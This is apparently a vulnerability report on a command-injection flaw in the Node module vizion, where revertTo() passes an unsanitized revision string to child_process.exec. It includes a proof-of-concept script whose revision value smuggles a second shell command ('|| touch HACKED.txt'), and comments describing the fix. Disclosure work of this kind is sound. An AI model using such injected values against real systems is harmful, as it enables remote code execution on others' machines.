The issue is an RCE (remote code execution) triggerable through the module.
This is possible because at https://github.com/keymetrics/vizion/blob/master/lib/git/git.js#L228 the `git reset --hard` command is concatenated with unsanitized input:
var command = cliCommand(args.folder, "git reset --hard " + args.revision);
The `command` variable is then passed to the `exec` function, which is declared as:
var exec = require('child_process').exec;
This makes it possible for any attacker who controls the `revision` attribute of the object passed to the `<vizion_object>.revertTo()` function to append additional shell commands to the string, leading to the RCE impact.
Prepare a git environment:
mkdir vizion # Makes a new directory where a *git* repository is initialized
cd vizion
git init # Initialize an empty repository in the new directory
echo "TEST_STRING" > test.txt # Create a file named "test.txt"
git add test.txt # Stage the new file in the index
git commit # Record the commit; its hash is presumably the legitimate part of the `revision` value used in poc.js
Then create the following file (inside the vizion directory):
// poc.js
// revertTo() reads args.folder and args.revision, builds the shell string
// "git reset --hard " + args.revision (lib/git/git.js) and hands it to
// child_process.exec, so shell metacharacters inside `revision` are interpreted
// by the shell instead of being treated as part of the revision name.
// No validation of `revision` is visible at the concatenation site; the fix is to
// check it against the expected hash/ref grammar and pass it as a separate argument
// (e.g. child_process.execFile) rather than building a shell command string.
var vizion = require('vizion');
vizion.revertTo({
// A well-formed commit hash followed by an injected command; the hash is presumably
// the one produced by the `git commit` step above.
revision : 'f0a1d45936cf7a3c969e4caba96546fd23255796 || touch HACKED.txt', folder : '.' },
function(err, data) {
console.log(data);
});
Run the poc.js file: `node poc.js`
The file HACKED.txt will be created {F580132}